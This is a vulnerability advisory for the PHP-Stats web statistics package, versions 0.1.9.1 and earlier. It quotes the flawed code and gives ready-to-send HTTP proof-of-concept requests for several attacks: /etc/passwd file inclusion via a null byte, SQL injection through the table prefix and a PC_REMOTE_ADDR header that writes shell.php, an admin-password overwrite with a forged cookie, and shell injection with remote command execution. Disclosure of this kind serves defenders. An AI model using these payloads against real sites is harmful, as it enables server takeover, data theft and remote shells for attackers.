php_stats_0191_adv.txt

`------------- PHP-Stats <= 0.1.9.1 remote commands execution -------------------  
  
software:  
site: http://www.phpstats.net/  
description: Open source statistical package for PHP enabled web sites  
--------------------------------------------------------------------------------  
i) vulnerable code in admin.php (and in nearly every scripts...) at line 65:  
  
...  
if(isset($_POST['option'])) { while (list ($key, $value) = each ($tmpOption)) $option[$key]=$value; }  
...  
  
you can overwrite at run-time the "option[]" array...,  
raising SQL injection, arbitrary local inclusion and php injection issues, poc:  
  
i.a) arbitrary local inclusion (with magic_quotes_gpc off):  
  
i.a1)  
POST [path]admin.php?do=0 HTTP/1.1\r\n";  
Content-Type: application/x-www-form-urlencoded  
Host: [somehost]  
Content-Length: [data_length]  
Connection: Close  
  
option=&option[clear_cache]=1&option[language]=../../../../../../etc/passwd[null char]  
  
i.a2)  
POST [path]admin.php?do=0 HTTP/1.1\r\n";  
Content-Type: application/x-www-form-urlencoded  
Host: [somehost]  
Content-Length: [data_length]  
Connection: Close  
  
option=&option[template]=../../../../../../etc/passwd[null char]  
  
i.b) SQL injection - you can inject arbitrary SQL commands through the table  
prefix, regardless of magic_quotes_gpc settings:  
  
POST [path]admin.php?do=0 HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
Host: [somehost]  
Content-Length: [data_length]  
Connection: Close  
  
option=&option[prefix]=[SQL]  
  
i.c) PHP code injection - you can grant administrative privileges, overwriting  
"option[admin_pass]" value and building a MD5 admin cookie on new value.  
Now you can inject a shell in two different ways by administrative features,  
poc:  
  
i.c1)  
POST [path]admin.php?action=esclusioni&opzioni=excfol HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
Cookie: php_stats_cache=1; pass_cookie=[md5 hash of "suntzu"]  
Host: [somehost]  
Content-Length: [data_length]  
Connection: Close  
  
option=&option[admin_pass]=suntzu&option_new=[SHELL]  
  
now you can launch commands including option/php-stats-options.php script,poc:  
  
POST [path]admin.php?cmd=netstat%20-ano&do=0 HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
Host: [somehost]  
Content-Length: [data_length]  
Connection: Close  
  
option=&option[language]=../option/php-stats-options.php[null char]  
  
i.c2) the most chritical, this works regardless of any php.ini settings, you  
can inject a shell in config.php and launch commands from it.  
Poc exploit here:  
  
http://retrogod.altervista.org/php_stats_0191_xpl.html  
  
--------------------------------------------------------------------------------  
ii) vulnerable code in click.php at line 18:  
  
...  
if(isset($_SERVER['REMOTE_ADDR'])) $ip=(isset($_SERVER['HTTP_PC_REMOTE_ADDR']) ? $_SERVER['HTTP_PC_REMOTE_ADDR'] : $_SERVER['REMOTE_ADDR']);  
...  
  
and line 65:  
  
...  
$result=sql_query("SELECT visitor_id FROM $option[prefix]_cache WHERE user_id='$ip' LIMIT 1");  
...  
  
you can inject sql commands through PC_REMOTE_ADDR http header, poc:  
  
GET [path]click.php?id=1&get=1 HTTP/1.1  
PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM php_stats_cache/*  
Host: [host]  
Connection: Close  
  
--------------------------------------------------------------------------------  
iii) information disclosure, you can go to:  
  
http://[target]/[path]/checktables.php  
  
to see at screen database table_prefix, making easier the exploitation process...  
  
--------------------------------------------------------------------------------  
rgod  
  
site: http://retrogod.altervista.org  
mail: rgod at autistici.org  
original advisory: http://retrogod.altervista.org/php_stats_0191_adv.html  
--------------------------------------------------------------------------------  
  
  
`